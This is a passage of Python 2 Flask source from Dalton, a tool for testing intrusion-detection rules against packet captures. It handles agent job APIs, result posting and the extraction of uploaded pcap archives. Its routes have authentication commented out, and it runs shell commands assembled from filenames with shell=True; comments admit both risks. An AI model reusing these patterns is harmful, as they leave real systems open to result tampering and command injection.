engine_config += "%s\r\n" % line
# comment out (other) rule includes .. actually I don't want to do this here.
# The engine config file is the place to do this.
#if line.startswith("include ") and line.endswith(".rules"):
# engine_config += "#%s\r\n" % line
#else:
# engine_config += "%s\r\n" % line
else:
if line.startswith("var ") and len([x for x in ignore_vars if x in line]) > 0:
engine_config += "%s\r\n" % line
else:
variables += "%s\r\n" % line
except StopIteration:
break
elif engine.lower().startswith('suri'):
# read in yaml with ruamel python lib, extract out vars
# doing it like this adds a little load time but preserves
# comments (for the most part). Can't use ruamel >= 0.15.x
# b/c it won't preserve the inputted YAML 1.1 on dump (e.g.
# quoted sexagesimals, unquoted 'yes', 'no', etc.
logger.debug("Loading YAML for %s" % conf_file)
# so apparently the default Suri config has what are interpreted
# as (unquoted) booleans and it uses yes/no. But if you change from
# yes/no to true/false, Suri will throw an error when parsing the YAML
# even though true/false are valid boolean valued for YAML 1.1. ruamel.yaml
# will normalize unquoted booleans to true/false so quoting them here to
# preserve the yes/no. This also done on submission..
contents = re.sub(r'(\w):\x20+(yes|no)([\x20\x0D\x0A\x23])', '\g<1>: "\g<2>"\g<3>', contents)
# suri uses YAML 1.1
config = yaml.round_trip_load(contents, version=(1,1), preserve_quotes=True)
# usually I try not to mess with the config here since the user should set
# desired defaults in the yaml on disk. But if the logging level is 'notice',
# that is next to useless and setting it to 'info' won't hurt anything and will
# provide some useful info such as number of rules loaded.
if "logging" in config and "default-log-level" in config['logging'] and config['logging']['default-log-level'] == "notice":
config['logging']['default-log-level'] = "info"
# pull out vars and dump
variables = yaml.round_trip_dump({'vars': config.pop('vars', None)})
# (depending on how you do it) the YAML verison gets added back
# in when YAML of just vars is dumped.
# This data (variables) is concatenated with the rest of the config and there
# can't be multiple version directives. So just in case, strip it out.
if variables.startswith("%YAML 1.1\n---\n"):
variables = variables[14:]
# dump engine_config
engine_config = yaml.round_trip_dump(config, version=(1,1), explicit_start=True)
else:
engine_config = '\r\n'.join([x.rstrip('\r\n') for x in contents])
variables = ''
else:
logger.warn("No suitable configuration file found for sensor '%s'." % sensor)
engine_config = "# No suitable configuration file found for sensor '%s'." % sensor
variables = "# No variables in config for sensor '%s'." % sensor
results = {'conf': engine_config, 'variables': variables}
return json.dumps(results)
except Exception, e:
logger.error("Problem getting configuration file for sensor '%s'. Error: %s\n%s" % (sensor, e, traceback.format_exc()))
engine_config = "# Exception getting configuration file for sensor '%s'." % sensor
variables = engine_config
results = {'conf': engine_config, 'variables': variables}
return json.dumps(results)
@dalton_blueprint.route('/dalton/sensor_api/update/', methods=['POST'])
#@auth_required('write')
# status update from Dalton Agent
def sensor_update():
""" a sensor has submitted an api update"""
global r
global STAT_CODE_DONE
uid = request.form.get('uid')
msg = request.form.get('msg')
job = request.form.get('job')
if int(get_job_status(job)) != STAT_CODE_DONE:
set_job_status_msg(job, msg)
logger.debug("Dalton Agent %s sent update for job %s; msg: %s" % (uid, job, msg))
return "OK"
@dalton_blueprint.route('/dalton/sensor_api/request_job/<sensor_tech>/', methods=['GET'])
#@auth_required('read')
def sensor_request_job(sensor_tech):
"""Sensor API. Called when a sensor wants a new job"""
# job request from Dalton Agent
global r
global STAT_CODE_RUNNING
SENSOR_UID = 'unknown'
try:
SENSOR_UID = request.args['SENSOR_UID']
except Exception, e:
SENSOR_UID = 'unknown'
SENSOR_IP = request.remote_addr
AGENT_VERSION = 'unknown'
try:
AGENT_VERSION = request.args['AGENT_VERSION']
except Exception, e:
AGENT_VERSION = 'unknown'
# update check-in data; use md5 hash of SENSOR_UID.SENSOR_IP
# note: sensor keys are expired by function clear_old_agents() which removes the sensor
# when it has not checked in in <x> amount of time (expire time configurable via
# 'agent_purge_time' parameter in dalton.conf).
hash = hashlib.md5()
hash.update(SENSOR_UID)
hash.update(SENSOR_IP)
SENSOR_HASH = hash.hexdigest()
r.sadd("sensors", SENSOR_HASH)
r.set("%s-uid" % SENSOR_HASH, SENSOR_UID)
r.set("%s-ip" % SENSOR_HASH, SENSOR_IP)
r.set("%s-time" % SENSOR_HASH, datetime.datetime.now().strftime("%b %d %H:%M:%S"))
r.set("%s-epoch" % SENSOR_HASH, int(time.mktime(time.localtime())))
r.set("%s-tech" % SENSOR_HASH, sensor_tech)
r.set("%s-agent_version" % SENSOR_HASH, AGENT_VERSION)
#grab a job! If it dosen't exist, return sleep.
response = r.lpop(sensor_tech)
if (response == None):
return "sleep"
else:
respobj = json.loads(response)
new_jobid = respobj['id']
logger.info("Dalton Agent %s grabbed job %s for %s" % (SENSOR_UID, new_jobid, sensor_tech))
# there is a key for each sensor which is ("%s-current_job" % SENSOR_HASH) and has
# the value of the current job id it is running. This value is set when a job is
# requested and set to 'None' when the results are posted. A sensor can only run
# one job at a time so if there is an exiting job when the sensor requests a new
# job then that means the sensor was interrupted while processing a job and could
# did not communicate back with the controller.
existing_job = r.get("%s-current_job" % SENSOR_HASH)
#logger.debug("Dalton in sensor_request_job(): job requested, sensor hash %s, new job: %s, existing job: %s" % (SENSOR_HASH, new_jobid, existing_job))
if existing_job and existing_job != new_jobid:
set_job_status(existing_job, STAT_CODE_INTERRUPTED)
set_job_status_msg(existing_job, "Job %s was unexpectedly interrupted while running on the agent; please try submitting the job again." % existing_job)
# these shouldn't be populated but set them to expire just in case to prevent redis memory build up
set_keys_timeout(existing_job)
r.set("%s-current_job" % SENSOR_HASH, new_jobid)
EXPIRE_VALUE = REDIS_EXPIRE
if r.get("%s-teapotjob" % new_jobid):
EXPIRE_VALUE = TEAPOT_REDIS_EXPIRE
r.expire("%s-current_job" % SENSOR_HASH, EXPIRE_VALUE)
r.set("%s-start_time" % new_jobid, int(time.time()))
r.expire("%s-start_time" % new_jobid, EXPIRE_VALUE)
set_job_status(new_jobid,STAT_CODE_RUNNING)
# if a user sees the "Running" message for more than a few dozen seconds (depending on
# the size of the pcap(s) and ruleset), then the job is hung on the agent or is going to
# timeout. Most likely the agent was killed or died during the job run.
set_job_status_msg(new_jobid, "Running...")
# set expire times for keys that are stored on server until job is requested
r.expire("%s-submission_time" % new_jobid, EXPIRE_VALUE)
r.expire("%s-user" % new_jobid, EXPIRE_VALUE)
r.expire("%s-tech" % new_jobid, EXPIRE_VALUE)
return response
@dalton_blueprint.route('/dalton/sensor_api/results/<jobid>', methods=['POST'])
#@auth_required('write')
def post_job_results(jobid):
""" called by Dalton Agent sending job results """
# no authentication or authorization so this is easily abused; anyone with jobid
# can overwrite results if they submit first.
global STAT_CODE_DONE, STAT_CODE_RUNNING, STAT_CODE_QUEUED, DALTON_URL, REDIS_EXPIRE, TEAPOT_REDIS_EXPIRE, TEMP_STORAGE_PATH
global r
# check and make sure job results haven't already been posted in order to prevent
# abuse/overwriting. This still isn't foolproof.
if r.exists("%s-time" % jobid) and (int(get_job_status(jobid)) not in [STAT_CODE_RUNNING, STAT_CODE_QUEUED]):
logger.error("Data for jobid %s already exists in database; not overwriting. Source IP: %s. job_status_code code: %d" % (jobid, request.remote_addr, int(get_job_status(jobid))))
#typically this would go back to Agent who then ignores it
return Response("Error: job results already exist.", mimetype='text/plain', headers = {'X-Dalton-Webapp':'Error'})
jsons = request.form.get('json_data')
result_obj = json.loads(jsons)
set_job_status_msg(jobid, "Final Job Status: %s" % result_obj['status'])
# get sensor hash and update ("%s-current_job" % SENSOR_HASH) with 'None'
SENSOR_IP = request.remote_addr
SENSOR_UID = 'unknown'
try:
SENSOR_UID = request.args['SENSOR_UID']
except Exception, e:
SENSOR_UID = 'unknown'
hash = hashlib.md5()
hash.update(SENSOR_UID)
hash.update(SENSOR_IP)
SENSOR_HASH = hash.hexdigest()
r.set("%s-current_job" % SENSOR_HASH, None)
r.expire("%s-current_job" % SENSOR_HASH, REDIS_EXPIRE)
logger.info("Dalton agent %s submitted results for job %s. Result: %s" % (SENSOR_UID, jobid, result_obj['status']))
#save results to db
if 'ids' in result_obj:
ids = result_obj['ids']
elif 'snort' in result_obj:
ids = result_obj['snort']
else:
ids = ""
if 'performance' in result_obj:
perf = result_obj['performance']
else:
perf = ""
if 'alert' in result_obj:
alert = result_obj['alert']
else:
alert = ""
if 'error' in result_obj:
error = result_obj['error']
else:
error = ""
if 'debug' in result_obj:
debug = result_obj['debug']
else:
debug = ""
if 'total_time' in result_obj:
time = result_obj['total_time']
else:
time = ""
# alert_detailed is base64 encoded unified2 binary data
alert_detailed = ""
if 'alert_detailed' in result_obj and U2_ANALYZER:
try:
# write to disk and pass to u2spewfoo.py; we could do
# myriad other things here like modify or import that
# code but this works and should be compatible and
# incorporate any future changes/improvements to the
# script
u2_file = os.path.join(TEMP_STORAGE_PATH, "%s_unified2_%s" % (jobid, SENSOR_HASH))
u2_fh = open(u2_file, "wb")
u2_fh.write(base64.b64decode(result_obj['alert_detailed']))
u2_fh.close()
u2spewfoo_command = "%s %s" % (U2_ANALYZER, u2_file)
logger.debug("Processing unified2 data with command: '%s'" % u2spewfoo_command)
alert_detailed = subprocess.Popen(u2spewfoo_command, shell=True, stderr=subprocess.STDOUT, stdout=subprocess.PIPE).stdout.read()
# delete u2 file
os.unlink(u2_file)
except Exception as e:
logger.error("Problem parsing unified2 data from Agent. Error: %s" % e)
alert_detailed = ""
else:
alert_detailed = ""
# other_logs only supported on Suricata for now
if "other_logs" in result_obj:
other_logs = result_obj['other_logs']
else:
other_logs = ""
r.set("%s-ids" % jobid, ids)
r.set("%s-perf" % jobid, perf)
r.set("%s-alert" % jobid, alert)
r.set("%s-error" % jobid, error)
r.set("%s-debug" % jobid, debug)
r.set("%s-time" % jobid, time)
r.set("%s-alert_detailed" % jobid, alert_detailed)
r.set("%s-other_logs" % jobid, other_logs)
set_keys_timeout(jobid)
if error:
set_job_status_msg(jobid, '<div style="color:red">ERROR!</div> <a href="/dalton/job/%s">Click here for details</a>' % jobid)
else:
set_job_status_msg(jobid, '<a href="/dalton/job/%s">Click here to view your results</a>' % jobid)
set_job_status(jobid, STAT_CODE_DONE)
return Response("OK", mimetype='text/plain', headers = {'X-Dalton-Webapp':'OK'})
# older versions used 'sensor_api' but it really should be 'controller_api'
@dalton_blueprint.route('/dalton/sensor_api/job_status/<jobid>', methods=['GET'])
@dalton_blueprint.route('/dalton/controller_api/job_status/<jobid>', methods=['GET'])
#@login_required()
def get_ajax_job_status_msg(jobid):
"""return the job status msg (as a string)"""
# user's browser requesting job status msg
global STAT_CODE_RUNNING
if not validate_jobid(jobid):
return Response("Invalid Job ID: %s" % jobid, mimetype='text/plain', headers = {'X-Dalton-Webapp':'OK'})
stat_code = get_job_status(jobid)
if stat_code:
if int(stat_code) == STAT_CODE_RUNNING:
check_for_timeout(jobid)
r_status_msg = get_job_status_msg(jobid)
if r_status_msg:
return Response(r_status_msg, mimetype='text/plain', headers = {'X-Dalton-Webapp':'OK'})
else:
return Response('Unknown', mimetype='text/plain', headers = {'X-Dalton-Webapp':'OK'})
else:
return Response("Invalid Job ID: %s" % jobid, mimetype='text/plain', headers = {'X-Dalton-Webapp':'OK'})
@dalton_blueprint.route('/dalton/controller_api/job_status_code/<jobid>', methods=['GET'])
#@login_required()
def get_ajax_job_status_code(jobid):
"""return the job status code (AS A STRING! -- you need to cast the return value as an int if you want to use it as an int)"""
# user's browser requesting job status code
global STAT_CODE_INVALID, STAT_CODE_RUNNING
if not validate_jobid(jobid):
return "%d" % STAT_CODE_INVALID
r_status_code = get_job_status(jobid)
if not r_status_code:
# invalid jobid
return "%d" % STAT_CODE_INVALID
else:
if int(r_status_code) == STAT_CODE_RUNNING:
check_for_timeout(jobid)
return get_job_status(jobid)
@dalton_blueprint.route('/dalton/sensor_api/get_job/<id>', methods=['GET'])
#@auth_required('read')
def sensor_get_job(id):
# user or agent requesting a job zip file
global JOB_STORAGE_PATH
# get the user (for logging)
logger.debug("Dalton in sensor_get_job(): request for job zip file %s" % (id))
if not validate_jobid(id):
logger.error("Bad jobid given: '%s'. Possible hacking attempt." % id)
return render_template('/dalton/error.html', jid=id, msg=["Bad jobid, invalid characters in: '%s'" % (id)])
path = "%s/%s.zip" % (JOB_STORAGE_PATH, id)
if os.path.exists(path):
filedata = open(path,'r').read()
logger.debug("Dalton in sensor_get_job(): sending job zip file %s" % (id))
return Response(filedata,mimetype="application/zip", headers={"Content-Disposition":"attachment;filename=%s.zip" % id})
else:
logger.error("Dalton in sensor_get_job(): could not find job %s at %s." % (id, path))
return render_template('/dalton/error.html', jid=id, msg=["Job %s does not exist on disk. It is either invalid or has been deleted." % id])
def clear_old_agents():
global r, AGENT_PURGE_TIME
if r.exists('sensors'):
for sensor in r.smembers('sensors'):
minutes_ago = int(round((int(time.mktime(time.localtime())) - int(r.get("%s-epoch" % sensor))) / 60))
if minutes_ago >= AGENT_PURGE_TIME:
# delete old agents
r.delete("%s-uid" % sensor)
r.delete("%s-ip" % sensor)
r.delete("%s-time" % sensor)
r.delete("%s-epoch" % sensor)
r.delete("%s-tech" % sensor)
r.delete("%s-agent_version" % sensor)
r.srem("sensors", sensor)
@dalton_blueprint.route('/dalton/sensor', methods=['GET'])
#@login_required()
def page_sensor_default(return_dict = False):
"""the default sensor page"""
global r
sensors = {}
# first clear out old agents ('sensors')
clear_old_agents()
if r.exists('sensors'):
for sensor in r.smembers('sensors'):
minutes_ago = int(round((int(time.mktime(time.localtime())) - int(r.get("%s-epoch" % sensor))) / 60))
sensors[sensor] = {}
sensors[sensor]['uid'] = "%s" % r.get("%s-uid" % sensor)
sensors[sensor]['ip'] = "%s" % r.get("%s-ip" % sensor)
sensors[sensor]['time'] = "%s (%d minutes ago)" % (r.get("%s-time" % sensor), minutes_ago)
sensors[sensor]['tech'] = "%s" % r.get("%s-tech" % sensor)
sensors[sensor]['agent_version'] = "%s" % r.get("%s-agent_version" % sensor)
if return_dict:
return sensors
else:
return render_template('/dalton/sensor.html', page='', sensors=sensors)
# validates passed in filename (should be from Flowsynth) to verify
# that it exists and isn't trying to do something nefarious like
# directory traversal
def verify_fs_pcap(fspcap):
global FS_PCAP_PATH
# require fspcap to be POSIX fully portable filename
if not re.match(r"^[A-Za-z0-9\x5F\x2D\x2E]+$", fspcap):
logger.error("Bad fspcap filename provided: '%s'. Filename must be POSIX fully portable." % fspcap)
return "Bad pcap filename provided: '%s'" % (fspcap)
fspcap_path = os.path.join(FS_PCAP_PATH, os.path.basename(fspcap))
logger.debug("Flowsynth pcap file passed: %s" % fspcap_path)
if not os.path.isfile(fspcap_path):
logger.error("fspcap file '%s' not found." % fspcap_path)
return "File not found: '%s'" % os.path.basename(fspcap)
return None
"""validate that job_id has expected characters; prevent directory traversal"""
def validate_jobid(jid):
if not re.match (r'^(teapot_)?[a-zA-Z\d]+$', jid):
return False
else:
return True
@dalton_blueprint.route('/dalton/coverage/<sensor_tech>/', methods=['GET'])
#@login_required()
def page_coverage_default(sensor_tech, error=None):
"""the default coverage wizard page"""
global CONF_STORAGE_PATH, MAX_PCAP_FILES
global r
ruleset_dirs = []
sensor_tech = sensor_tech.split('-')[0]
conf_dir = "%s/%s" % (CONF_STORAGE_PATH, sensor_tech)
if sensor_tech is None:
return render_template('/dalton/error.html', jid='', msg=["No Sensor technology selected for job."])
elif not re.match(r"^[a-zA-Z0-9\_\-\.]+$", sensor_tech):
return render_template('/dalton/error.html', jid='', msg=["Invalid Sensor technology requested: %s" % sensor_tech])
elif sensor_tech == 'summary':
return render_template('/dalton/error.html', jid='', msg=["Page expired. Please resubmit your job or access it from the queue."])
if not os.path.isdir(conf_dir):
return render_template('/dalton/error.html', jid='', msg=["No engine configuration directory for '%s' found (%s)." % (sensor_tech, conf_dir)])
# pcap filename passed in from Flowsynth
fspcap = None
try:
fspcap = request.args['fspcap']
err_msg = verify_fs_pcap(fspcap)
if err_msg != None:
return render_template('/dalton/error.html', jid='', msg=["%s" % (err_msg)])
except:
fspcap = None
# get list of rulesets based on engine
rulesets = get_rulesets(sensor_tech.split('-')[0])
# enumerate sensor versions based on available sensors and pass them to coverage.html
# This way we can dynamically update the submission page as soon as new sensor versions check in
clear_old_agents()
sensors = []
if r.exists('sensors'):
for sensor in r.smembers('sensors'):
try:
tech = r.get("%s-tech" % sensor)
if tech.startswith(sensor_tech):
if tech not in sensors:
sensors.append(tech)
except Exception, e:
return render_template('/dalton/error.hml', jid=None, msg="Error getting sensor list for %s. Error:\n%s" % (tech, e))
try:
# sort by version number
sensors.sort(key=LooseVersion, reverse=True)
except Exception as e:
sensors.sort(reverse=True)
# get conf or yaml file if sensor supports it
engine_conf = None
# return the engine.conf from the first sensor in the list which is sorted (see above)
# and should be the most recent sensor version (depends on lexical sort done above). It
# is also the sensor version that is checked by default on the job submission page.
# this also handles populating ip/port variables
if len(sensors) > 0:
try:
configs = json.loads(get_engine_conf_file(sensors[0]))
#logger.debug("CONfigs:\n%s" % configs)
engine_conf = configs['conf']
variables = configs['variables']
except Exception as e:
logger.error("Could not process JSON from get_engine_conf_file: %s" % e)
engine_conf = "# not found"
variables = "# not found"
else:
# no sensors available. Job won't run be we can provide a default engine.conf anyway
engine_conf = "# not found"
variables = "# not found"
return render_template('/dalton/coverage.html', sensor_tech = sensor_tech,rulesets = rulesets, error=error, variables = variables, engine_conf = engine_conf, sensors=sensors, fspcap=fspcap, max_pcaps=MAX_PCAP_FILES)
@dalton_blueprint.route('/dalton/job/<jid>')
#@auth_required()
def page_show_job(jid):
global r
tech = r.get("%s-tech" % jid)
status = get_job_status(jid)
if not status:
# job doesn't exist
# expire (delete) all keys related to the job just in case to prevent memory leaks
expire_all_keys(jid)
return render_template('/dalton/error.html', jid=jid, msg=["Invalid Job ID. Job may have expired.", "By default, jobs are only kept for %d seconds; teapot jobs are kept for %s seconds." % (REDIS_EXPIRE, TEAPOT_REDIS_EXPIRE)])
elif int(status) != STAT_CODE_DONE:
# job is queued or running
return render_template('/dalton/coverage-summary.html', page='', job_id=jid, tech=tech)
else:
# job exists and is done
ids = r.get("%s-ids" % jid)
perf = r.get("%s-perf" % jid)
alert = r.get("%s-alert" % jid)
error = r.get("%s-error" % jid)
total_time = r.get("%s-time" % jid)
alert_detailed = r.get("%s-alert_detailed" % jid)
try:
# this gets passed as json with log description as key and log contents as value
# attempt to load it as json before we pass it to job.html
other_logs = json.loads(r.get("%s-other_logs" % jid))
except Exception, e:
# if <jid>-other_logs is empty then error, "No JSON object could be decoded" will be thrown so just handling it cleanly
other_logs = ""
#logger.error("could not load json other_logs:\n%s\n\nvalue:\n%s" % (e,r.get("%s-other_logs" % jid)))
# parse out custom rules option and pass it?
custom_rules = False
try:
debug = r.get("%s-debug" % jid)
except Exception, e:
debug = ''
overview = {}
if (alert != None):
overview['alert_count'] = alert.count('[**]') / 2
else:
overview['alert_count'] = 0
if (error == ""):
overview['status'] = 'Success'
else:
overview['status'] = 'Error'
return render_template('/dalton/job.html', overview=overview,page = '', jobid = jid, ids=ids, perf=perf, alert=alert, error=error, debug=debug, total_time=total_time, tech=tech, custom_rules=custom_rules, alert_detailed=alert_detailed, other_logs=other_logs)
# sanitize passed in filename (string) and make it POSIX (fully portable)
def clean_filename(filename):
return re.sub(r"[^a-zA-Z0-9\_\-\.]", "_", filename)
# handle duplicate filenames (e.g. same pcap sumbitted more than once)
# by renaming pcaps with same name
def handle_dup_names(filename, pcap_files, job_id, dupcount):
for pcap in pcap_files:
if pcap['filename'] == filename:
filename = "%s_%s_%d.pcap" % (os.path.splitext(filename)[0], job_id, dupcount[0])
dupcount[0] += 1
break
return filename
# extracts files from an archive and add them to the list to be
# included with the Dalton job
def extract_pcaps(archivename, pcap_files, job_id, dupcount):
global TEMP_STORAGE_PATH
# Note: archivename already sanitized
logger.debug("Attempting to extract pcaps from file '%s'" % os.path.basename(archivename))
if archivename.lower().endswith('.zip'):
# Apparently python zipfile module does extraction using Python and not something
# like C and it is super slow for a zipfile that isn't small in size. So
# to speed things up, kick out to 7z on the system which is quite fast but not my
# first choice. Still use zipfile module to process archive and get filenames.
try:
if not zipfile.is_zipfile(archivename):
msg = "File '%s' is not recognized as a valid zip file." % os.path.basename(archivename)
logger.error(msg)
return msg
files_to_extract = []
zf = zipfile.ZipFile(archivename, mode='r')
for file in zf.namelist():
logger.debug("Processing file '%s' from ZIP archive" % file)
if file.endswith('/'):
continue
filename = clean_filename(os.path.basename(file))
if os.path.splitext(filename)[1].lower() not in ['.pcap', '.pcapng', '.cap']:
logger.warn("Not adding file '%s' from archive '%s': '.pcap', '.cap', or '.pcapng' extension required." % (file, os.path.basename(archivename)))
# just skip the file, and move on (and log it)
continue
files_to_extract.append(file)
zf.close()
if len(files_to_extract) > 0:
# make temporary location for extracting with 7z
tempd = tempfile.mkdtemp()
logger.debug("temp directory for 7z: %s" % tempd)
# try password 'infected' if password on archive
p7z_command = ['7z', 'x', archivename, '-pinfected', '-y', "-o%s" % tempd] + files_to_extract
# does 7z handle invalid/filenames or should more sanitization be attempted?
logger.debug("7z command: %s" % p7z_command)
# I'm not convinced that 7z outputs to stderr
p7z_out = subprocess.Popen(p7z_command, shell=False, stderr=subprocess.STDOUT, stdout=subprocess.PIPE).stdout.read()
if "Everything is Ok" not in p7z_out and "Errors: " in p7z_out:
logger.error("Problem extracting ZIP archive '%s': %s" % (os.path.basename(archivename), p7z_out))
raise Exception("p7zip error. See logs for details")
logger.debug("7z out: %s" % p7z_out)
# move files; handle duplicate filenames
for file in files_to_extract:
filename = clean_filename(os.path.basename(file))
filename = handle_dup_names(filename, pcap_files, job_id, dupcount)
pcappath = os.path.join(TEMP_STORAGE_PATH, job_id, filename)
pcapsrc = os.path.join(tempd, file)
# copy
shutil.move(pcapsrc, pcappath)
pcap_files.append({'filename': filename, 'pcappath': pcappath})
logger.debug("Successfully extracted and added pcap file '%s'" % os.path.basename(filename))
# cleanup
shutil.rmtree(tempd)
except Exception as e:
msg = "Problem extracting ZIP file '%s': %s" % (os.path.basename(archivename), e)
logger.error(msg)
logger.debug("%s" % traceback.format_exc())
return msg
elif os.path.splitext(archivename)[1].lower() in ['.gz', '.gzip'] and \
os.path.splitext(os.path.splitext(archivename)[0])[1].lower() not in ['.tar']:
# gzipped file
try:
filename = os.path.basename(os.path.splitext(archivename)[0])
logger.debug("Decompressing gzipped file '%s'" % filename)
with gzip.open(archivename, 'rb') as gz:
filename = handle_dup_names(filename, pcap_files, job_id, dupcount)
pcappath = os.path.join(TEMP_STORAGE_PATH, job_id, filename)
fh = open(pcappath, 'wb')
fh.write(gz.read())
fh.close()
pcap_files.append({'filename': filename, 'pcappath': pcappath})
logger.debug("Added %s" % filename)
except Exception as e:
msg = "Problem extracting gzip file '%s': %s" % (os.path.basename(archivename), e)
logger.error(msg)
logger.debug("%s" % traceback.format_exc())
return msg
elif os.path.splitext(archivename)[1].lower() in ['.bz2'] and \
os.path.splitext(os.path.splitext(archivename)[0])[1].lower() not in ['.tar']:
# bzip2 file
try:
filename = os.path.basename(os.path.splitext(archivename)[0])
logger.debug("Decompressing bzip2 file '%s'" % filename)
with bz2.BZ2File(archivename, 'rb') as bz:
filename = handle_dup_names(filename, pcap_files, job_id, dupcount)
pcappath = os.path.join(TEMP_STORAGE_PATH, job_id, filename)
fh = open(pcappath, 'wb')
fh.write(bz.read())
fh.close()
pcap_files.append({'filename': filename, 'pcappath': pcappath})
logger.debug("Added %s" % filename)
except Exception as e:
msg = "Problem extracting bzip2 file '%s': %s" % (os.path.basename(archivename), e)
logger.error(msg)
logger.debug("%s" % traceback.format_exc())
return msg
else:
try:
archive = tarfile.open(archivename, mode="r:*")
for file in archive.getmembers():
logger.debug("Processing file '%s' from archive" % file.name)
if not file.isfile():
logger.warn("Not adding member '%s' from archive '%s': not a file." % (file.name, os.path.basename(archivename)))
continue
filename = clean_filename(os.path.basename(file.name))
if os.path.splitext(filename)[1].lower() not in ['.pcap', '.pcapng', '.cap']:
logger.warn("Not adding file '%s' from archive '%s': '.pcap', '.cap', or '.pcapng' extension required." % (file.name, os.path.basename(archivename)))
# just skip the file, and move on (and log it)
continue
filename = handle_dup_names(filename, pcap_files, job_id, dupcount)
pcappath = os.path.join(TEMP_STORAGE_PATH, job_id, filename)
fh = open(pcappath, 'wb')
contentsfh = archive.extractfile(file)
fh.write(contentsfh.read())
fh.close()
pcap_files.append({'filename': filename, 'pcappath': pcappath})
logger.debug("Added %s" % filename)
archive.close()
except Exception as e:
msg = "Problem extracting archive file '%s': %s" % (os.path.basename(archivename), e)
logger.error(msg)
logger.debug("%s" % traceback.format_exc())
return msg
return None
# abstracting the job submission method away from the HTTP POST and creating this
# function so that it can be called easier (e.g. from an API)
def submit_job():
logger.debug("submit_job() called")
# never finished coding this...
# TODO: API call that accepts a job zipfile and queues it up for an agent?
# would have to beef up input validation on agent probably....
@dalton_blueprint.route('/dalton/coverage/summary', methods=['POST'])
#@auth_required()
# ^^ can change and add resource and group permissions if we want to restrict who can submit jobs
def page_coverage_summary():
""" the summary page once the coverage wizard has been submitted"""
# user submitting a job to Dalton via the web interface
global JOB_STORAGE_PATH
global TEMP_STORAGE_PATH
global RULESET_STORAGE_PATH
global r
global STAT_CODE_QUEUED
global FS_PCAP_PATH
global MAX_PCAP_FILES
verify_temp_storage_path()
digest = hashlib.md5()
prod_ruleset_name = None
# get the user who submitted the job .. not implemented
user = "undefined"
#generate job_id based of pcap filenames and timestamp
digest.update(str(datetime.datetime.now()))
digest.update(str(random.randrange(96313375)))
job_id = digest.hexdigest()[0:16] #this is a temporary job id for the filename
#store the pcaps offline temporarily
# make temp job directory so there isn't a race condition if more
# than one person submits a pcap with the same filename at the same time
if os.path.exists(os.path.join(TEMP_STORAGE_PATH, job_id)):
shutil.rmtree(os.path.join(TEMP_STORAGE_PATH, job_id))
os.makedirs(os.path.join(TEMP_STORAGE_PATH, job_id))
# list of dicts that have filename: and pcappath: entries for pcap files on disk to include in job
pcap_files = []
form_pcap_files = []
# pcapfilename from Flowsynth; on local (Dalton controller) disk
if request.form.get("fspcap"):
fspcap = request.form.get("fspcap")
err_msg = verify_fs_pcap(fspcap)
if err_msg:
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=[err_msg])
pcap_files.append({'filename': fspcap, 'pcappath': os.path.join(FS_PCAP_PATH, os.path.basename(fspcap))})
# grab the user submitted files from the web form (max number of arbitrary files allowed on the web form
# governed by max_pcap_files variable in dalton.conf)
# note that these are file handle objects? have to get filename using .filename
# make this a list so I can pass by reference
dupcount = [0]
for i in range(MAX_PCAP_FILES):
try:
pcap_file = request.files['coverage-pcap%d' % i]
if (pcap_file != None and pcap_file.filename != None and pcap_file.filename != '<fdopen>' and (len(pcap_file.filename) > 0) ):
if os.path.splitext(pcap_file.filename)[1].lower() in ['.zip', '.tar', '.gz', '.tgz', '.gzip', '.bz2']:
filename = clean_filename(os.path.basename(pcap_file.filename))
filename = os.path.join(TEMP_STORAGE_PATH, job_id, filename)
pcap_file.save(filename)
err_msg = extract_pcaps(filename, pcap_files, job_id, dupcount)
if err_msg:
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=[err_msg])
else:
form_pcap_files.append(pcap_file)
except:
logger.debug("%s" % traceback.format_exc())
pass
if len(form_pcap_files) == 0 and len(pcap_files) == 0:
#throw an error, no pcaps submitted
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["You must specify a PCAP file."])
elif (request.form.get('optionProdRuleset') == None and request.form.get('optionCustomRuleset') == None):
#throw an error, no rules defined
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["You must specify at least one ruleset."])
else:
#get the sensor technology and queue name
sensor_tech = request.form.get('sensor_tech')
#verify that we have a sensor that can handle the submitted sensor_tech
valid_sensor_tech = False
if r.exists('sensors'):
for sensor in r.smembers('sensors'):
if r.get("%s-tech" % sensor) == sensor_tech:
valid_sensor_tech = True
break
if not valid_sensor_tech:
logger.error("Dalton in page_coverage_summary(): Error: user %s submitted a job for invalid sensor tech, \'%s\'" % (user, sensor_tech))
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["There are no sensors that support sensor technology \'%s\'." % sensor_tech])
# process files from web form
for pcap_file in form_pcap_files:
filename = os.path.basename(pcap_file.filename)
# do some input validation on the filename and try to do some accommodation to preserve original pcap filename
filename = clean_filename(filename)
if os.path.splitext(filename)[1] != '.pcap':
filename = "%s.pcap" % filename
# handle duplicate filenames (e.g. same pcap sumbitted more than once)
filename = handle_dup_names(filename, pcap_files, job_id, dupcount)
pcappath = os.path.join(TEMP_STORAGE_PATH, job_id, filename)
pcap_files.append({'filename': filename, 'pcappath': pcappath})
pcap_file.save(pcappath)
# If multiple files submitted to Suricata, merge them here since
# Suricata can only read one file.
if len(pcap_files) > 1 and sensor_tech.startswith("suri"):
if not MERGECAP_BINARY:
logger.error("No mergecap binary; unable to merge pcaps for Suricata job.")
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid=job_id, msg=["No mergecap binary found on Dalton Controller.", "Unable to process multiple pcaps for this Suricata job."])
combined_file = "%s/combined-%s.pcap" % (os.path.join(TEMP_STORAGE_PATH, job_id), job_id)
mergecap_command = "%s -w %s -F pcap %s" % (MERGECAP_BINARY, combined_file, ' '.join([p['pcappath'] for p in pcap_files]))
logger.debug("Multiple pcap files sumitted to Suricata, combining the following into one file: %s" % ', '.join([p['filename'] for p in pcap_files]))
try:
# validation on pcap filenames done above; otherwise OS command injection here
mergecap_output = subprocess.Popen(mergecap_command, shell=True, stderr=subprocess.STDOUT, stdout=subprocess.PIPE).stdout.read()
if len(mergecap_output) > 0:
# return error?
logger.error("Error merging pcaps with command:\n%s\n\nOutput:\n%s" % (mergecap_command, mergecap_output))
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid="<not_defined>", msg=["Error merging pcaps with command:", "%s" % mergecap_command, "Output:", "%s" % (mergecap_command, mergecap_output)])
